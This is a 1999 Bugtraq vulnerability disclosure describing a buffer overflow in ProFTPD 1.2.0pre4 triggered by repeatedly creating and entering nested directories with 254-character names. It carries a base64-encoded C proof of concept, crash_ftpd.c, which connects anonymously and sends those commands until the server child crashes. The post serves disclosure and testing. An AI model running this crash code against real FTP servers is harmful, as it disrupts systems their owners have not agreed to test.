Date: Tue, 7 Sep 1999 18:51:26 +0200
From: Renaud Deraison <deraison@CVS.NESSUS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ProFTP-1.2.0pre4 buffer overflow -- once more
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---1463810815-1766910372-936723086=:3522
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
I have found out yet another buffer overflow in ProFTP 1.2.0pre4, which
may or may not be exploitable. I have noticed the authors and other
security related persons a week ago, and I still got no answer, in spite
of my repost.
So either they do not care, either my set up is badly done.
Why it may not be easily exploited (or not at all) : because the
segmentation fault is not done because of a changed return adress. The
overflow will in fact change a pointer and make it point on somewhere
else, and then FTPD will use strlen() on it. Anyway, maybe other
variables may be changed, I have not looked at it carefully yet.
How does the overflow works : this is a variation of the infamous and
now-old wu-ftpd mkdir overflow (make a directory in another directory, in
another directory, and so on), but this time, the name of the created
directories must not exceed 255 chars. That's all.
Attached to this message is a dumb program that will just make the remote
proftpd crash. Have a look at /var/log/messages, and you'll see something
as fun as :
Sep 1 14:18:49 prof proftpd[5327]: ProFTPD terminating (signal 11)
(quick note : the program will not check for error code, so make sure you
have the right to create directories in the appropriate directory, or
you'll get false positives/negatives).
This is *not* a DoS attack, since only a ProFTPd child will die.
I tested this flaw with proftpd 1.2.0pre4 as seen of
ftp://ftp.tos.net/pub/proftpd.
This problem was tested on a RedHat 6.0.
Patch : use something else / another good reason to not have
anonymous writeable directories.
-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org
---1463810815-1766910372-936723086=:3522
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="crash_ftpd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9909071851260.3522@prof.fr.nessus.org>
Content-Description: Be sure to edit this file before starting it
Content-Disposition: attachment; filename="crash_ftpd.c"
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j
bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU
UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog
Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz
dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0
aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy
aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk
IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog
Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2
cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg
IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l
IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K
IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz
b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD
V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy
ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt
a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h
bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0
KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6
ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu
X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0
YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j
a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog
ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg
c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy
NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz
cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1
NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl
Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw
XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j
LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo
c29jLCAiUEFTUyBqb2VAXHJcbiIsIHN0cmxlbigiUEFTUyBqb2VAXHJcbiIp
LDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAwKTsNCiAgYnplcm8oYnVm
LCAxMDI0KTsNCiAgc2VuZChzb2MsIHdyaXRlYWJsZV9kaXIsIHN0cmxlbih3
cml0ZWFibGVfZGlyKSwgMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDAp
Ow0KICBiemVybyhidWYsMTAyNCk7DQogIA0KICANCiAgZm9yKGk9MDtpPDQw
O2krKykNCiAgew0KICAgc2VuZChzb2MsIG1rZCwgc3RybGVuKG1rZCksIDAp
Ow0KICAgcmVjdihzb2MsIGJ1ZiwgMTAyNCwwKTsNCiAgIGlmKCFzdHJsZW4o
YnVmKSkNCiAgIHsNCiAgICBwcmludGYoIlJlbW90ZSBGVFBkIGNyYXNoZWQg
KHNlZSAvdmFyL2xvZy9tZXNzYWdlcylcbiIpOw0KICAgIGV4aXQoMCk7DQog
ICB9DQogICBiemVybyhidWYsIDEwMjQpOw0KICAgc2VuZChzb2MsIGN3ZCwg
c3RybGVuKGN3ZCksIDApOw0KICAgcmVjdihzb2MsIGJ1ZiwgMTAyNCwwKTsN
CiAgIGlmKCFzdHJsZW4oYnVmKSkNCiAgIHsNCiAgICBwcmludGYoIlJlbW90
ZSBGVFBkIGNyYXNoZWQgKHNlZSAvdmFyL2xvZy9tZXNzYWdlcylcbiIpOw0K
ICAgIGV4aXQoMCk7DQogICB9DQogICBiemVybyhidWYsIDEwMjQpOw0KICB9
DQogIHByaW50ZigiWW91IHdlcmUgbm90IHZ1bG5lcmFibGUgYWZ0ZXIgYWxs
LiBTb3JyeVxuIik7DQogIGNsb3NlKHNvYyk7DQogfQ0KIGVsc2UgcGVycm9y
KCJjb25uZWN0ICIpOw0KIHJldHVybigwKTsNCn0NCiAgIA0KICANCg==
---1463810815-1766910372-936723086=:3522--
